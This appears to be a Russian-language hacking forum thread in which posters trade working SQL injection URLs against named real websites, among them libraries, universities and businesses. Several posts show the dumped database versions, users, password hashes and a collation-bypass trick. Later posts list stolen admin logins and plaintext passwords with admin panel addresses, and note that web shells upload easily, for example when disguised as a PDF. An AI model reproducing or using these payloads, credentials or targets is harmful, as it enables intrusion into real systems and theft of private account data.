Разные разности: Code: http://www.owensound.library.on.ca/news-full.php?NewsID=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/* http://www.spec.bc.ca/news/news.php?newsID=999999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7-- http://www.1049thebeach.ca/news_item.php?NewsID=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22/* http://www.nlc.bc.ca/public.news.php?NewsActiveList=newsdetails&NewsID=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14/* http://www.onlc.ca/newsfull.php?NewsID=999999+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/* http://www.myheritage.es/FP/newsItem.php?s=786&newsID=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*&sourceList=dir http://www.vibez.us/en/products/detail_mp3.php?pid=99999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*&page=3 http://www.park-ridge.il.us/record.php?_ID=99999+union+select+1,concat_ws(0x3a,username,PASSWORD,ip),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+prkhome_ciab.ciab_member
Magazine Code: http://online-market.com.ua/stat_info.php?id=99999+union+select+1,version(),3,4/* version: 5.0.41-community-log user: onlinem_user@localhost database: onlinem_base Code: http://www.fangoria.com/fearful_feature.php?id=99999'+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15/* version: 5.0.22 user: fango_site@localhost database: joesena_fangoria Онлайн аукционы Code: http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,version(),4,5,6,7/* version: 5.0.45-log user: [email protected] database: u72447 Code: http://www.elcom.md/news.php?id=99999+union+select+1,2,version(),4,5,6,7/* version: 5.0.27 user: 17325@localhost database: 17325
тИЦ = 750 Code: http://rezonans.info/index.php?p=news&nID=-1+union+select+1,2,3,4,5,6,7,8,9,10/* version() - 5.0.45 database() - admin_smi user() - admin_smi@localhost -------------------------------------------- тИЦ = 230 Code: http://www.womanineurope.com/beauty/show_fashion.php?cat=news&fnr=-1+union+select+1,version(),user(),4,5,database(),7/* version() - 4.0.27-max-log database() - db125240836 user() - [email protected] -------------------------------------------- Code: http://www.michiganbusiness.us/showcompany.php?id=-1%0Aunion%0Aselect%0A1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52-- version() - 4.0.27-standard user() - michigan_michiga@localhost database() - michigan_mbusiness
Code: http://www.grably.ru/restaurants?id=9999+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,0,1,2,3,4,5,6+from+INFORMATION_SCHEMA.TABLES-- Code: http://www.specialradio.ru/mkz/?id=-1+union+select+1,version(),3,user(),5,6,7,8,9--
Цитрус Компания по разработке сайтов. Уязвимость в их CMS. Пример: Панель администратора: КирИТас Компания по разработке сайтов.Уязвимость в CMS на сайте. Пример: Панель администратора:
У меня такая проблема - когда ввожу такую строку http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,password,4,5,6,7+from+members выдаёт вот такую ошибку - Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_swedish_ci,IMPLICIT) for operation 'UNION' ОДнако на такой запрос http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,id,4,5,6,7+from+members - реагирует нормально. может быть кто-нибудь знает как эту фигню обойти??
проблему решил!гугл помог. Если кому интересно , составил такой запрос http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,convert(password+using+cp1251),4,5,6,7+from+members на что получил хэши пользователей)
foopi tables with passwords http://bestwayusa.ru/maillist/admin/?page=configure http://bestwayusa.ru/chatlive/admin http://bestwayusa.ru/dealer_login.php http://bestwayusa.ru/admin.php didnt find password in db
Code: http://www.sil.org/silepubs/abstract.asp?id=1%27+or+1=@@VERSION-- таблицы: Code: 'dtproperties','bibliography','CountriesList','Country_Index','Language_Index','LanguagesList','name_index','Serials_Index','Serials_List','SIL_Epubs','subject_code_categories','Subject_index','sysconstraints','syssegments'
по традиции, продолжаем серию .edu North Carolina Agricultural and Technical State University Code: http://www.ncat.edu/press_releases/disp_release.php?ID=-2930+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user,0x3a,password,0x3a,host),17,18+from+mysql.user+limit+1,1/* 4.0.12-standard PR=8 ---------------------------------------------------------------- Stanford Code: http://ed.stanford.edu/suse/news-bureau/displayRecord.php?tablename=susenews&id=-71+union+select+1,concat(user,0x3a,password,0x3a,host),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user+limit+22,1/* 5.0.22 PR=7 --------------------------------------------------------------- COMET Outreach Program Code: http://www.comet.ucar.edu/outreach/details.php?id=-2126+union+select+1,concat(username,0x3a,password),version(),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users/* vickie:comet(х.з. откуда...) 5.0.26-log PR=6 На сайте имеется мини-квест с java технологиями =) (кто пройдет, отпишитесь, ок? ) Code: http://strc.comet.ucar.edu/documents/login.htm ------------------------------------------------------------ Tufts University Code: http://inside.tufts.edu/announce/index.php?t=id&id=640+union+select+1,2,unhex(hex(version())),4,5,6,7,8+from+users/* 4.1.14-log PR=6
Неподходит логин и пасс, думаю из за того что он от шопа, в базе ковырялся, так и не нашел, может кому то из вас повезет. dca1:dertg1
5.0.51a-community onlymelb@localhost onlymelb_melbourne Больше ничего нашел интересного кроме как: 228 - таблиц 14633 - мыл emails = 170 таблица Админка: Code: http://www.onlymelbourne.com.au/admin1.htm Login: alan Pass: jaxons2008 ------------------------------------------------------------------------------------------------------------------------ 5.0.45-log
Скули из таблицы user базы mysql (5 шт.) zq16167 ; 22f421104e6fdb11 Вот, и с MySQL паролик вытащили. Проверьте, если есть желание... просто пароль в публичной базе не нашел, а брутить... =( yroot ; 135a94ef50ef2ac7 http://www.medtechmammography.com/admin/ - phpMyAdmin 2.5.0 (PR 2) root ; 7eba08fa3d983a6b (PR 2) root ; 39d5d18a469d0dc5 (PR 3) root ; 41bb620c59bba24e хеш не подобрал :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Скули с админками (12 шт.): Админ форума - Tof ; d780ef00c2edaf2f26f92e06a0db5f30 пароль - 5275326 Стоит phpBB форум! Вот логин;хеш админа, хеш подобрать не смог! admin;9fed66b17b90086737f7718f83f2c6dd Более 2600 зареганых пользователей http://www.doctordans.com/login.php DanFanselow ; nae2Itha Очень хорошо льется шелл =) chiefadmin ; chief http://www.haltonheritage.com/admin/ Отлично льется шелл (Если его под видом pdf приаттачивать! =)) есть доступ к соседним сайтикам... короче интересное место! =) (PR 2) http://www.atlascaptives.com/admin/ atlas ; 9455556 (PR 3) admin ; al-nafeh http://www.al-nafeh.com/admin/login.php (PR 2) Логин - dinesh хеш - 9c9f1c65b1dc1f79498c9f09eb610e1a Пароль - dinesh http://www.techaltar.com/admin/ (PR 0) mstaton ; goofy1 Есть админка, но пароль туда не подходит... =( http://www.mickstaton.com/admin/ (PR 3) http://www.switchvfx.com/en/admin/ switchadmin ; w3bt3@m Неполадки с сервером MySQL Randy53215 ; b1e0d66c6238a74d0c22f1e7576e797f Подобрать хеш не смог! Кстати, там какая то бага с авторизацией! При первом заходе я зашел под каким то юзверем, и по глупости вышел, а рега не работает! =( (PR 1) admin ; st0pkran http://antikwar.by/admin/login.php пароль почему то не подходит... http://www.hmc.edu/admin/ не работает! =( (PR корневого сайта - 7, субдомена - 4) :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Всякие-разные скули (28 шт.): ::::::::::::::::::::::::::::: Украина ::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::: Зона .com ::::::::::::::::::::::::::::: (PR ???) (PR 0) (PR 0) (PR 3) (PR 4) админка похоже тут http://carlighthouse.com/admin/login.php Но что то пока не пашет! (PR 0) (PR 4) (PR 1) ::::::::::::::::::::::::::::: Зона .net ::::::::::::::::::::::::::::: (PR 3) (PR 1) (PR 3) ::::::::::::::::::::::::::::: Англия ::::::::::::::::::::::::::::: Есть админка, нерабочая, дальше искать не стал. http://www.cedexx.co.uk/admin/ Админку не нашел ::::::::::::::::::::::::::::: Австралия ::::::::::::::::::::::::::::: Вот тут непонятно... из information_schema достает, а из своей не хочет... странно... Не смог подобрать таблицу юзверей! Вероятнее всего стоит префикс... ::::::::::::::::::::::::::::: Белоруссия ::::::::::::::::::::::::::::: Также не смог подобрать таблицу... =( http://noutbuk.by/admin/ Также не смог подобрать таблицу... =( ::::::::::::::::::::::::::::: Италия ::::::::::::::::::::::::::::: хм... странный сайт... из базы достает юзеров а пароли нет... рут переименовал столбец чтоли... ::::::::::::::::::::::::::::: Зона .info ::::::::::::::::::::::::::::: http://tipsforliving.info/admin/ Админка похоже закрыта .htaccess по ip... =( Итого: 45 скулей! =) P.S. Если есть неточности, пожалуйста сообщите, скули были найдены несколько дней назад, мошли измениться пароли и т.п.
Code: http://www.persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude-- Code: http://www.reper.ru/rus/index.php?catid=-91%20union%20select%201,2,3,version(),5,6,7,8,9,0,1,2,3,4%20admin/*
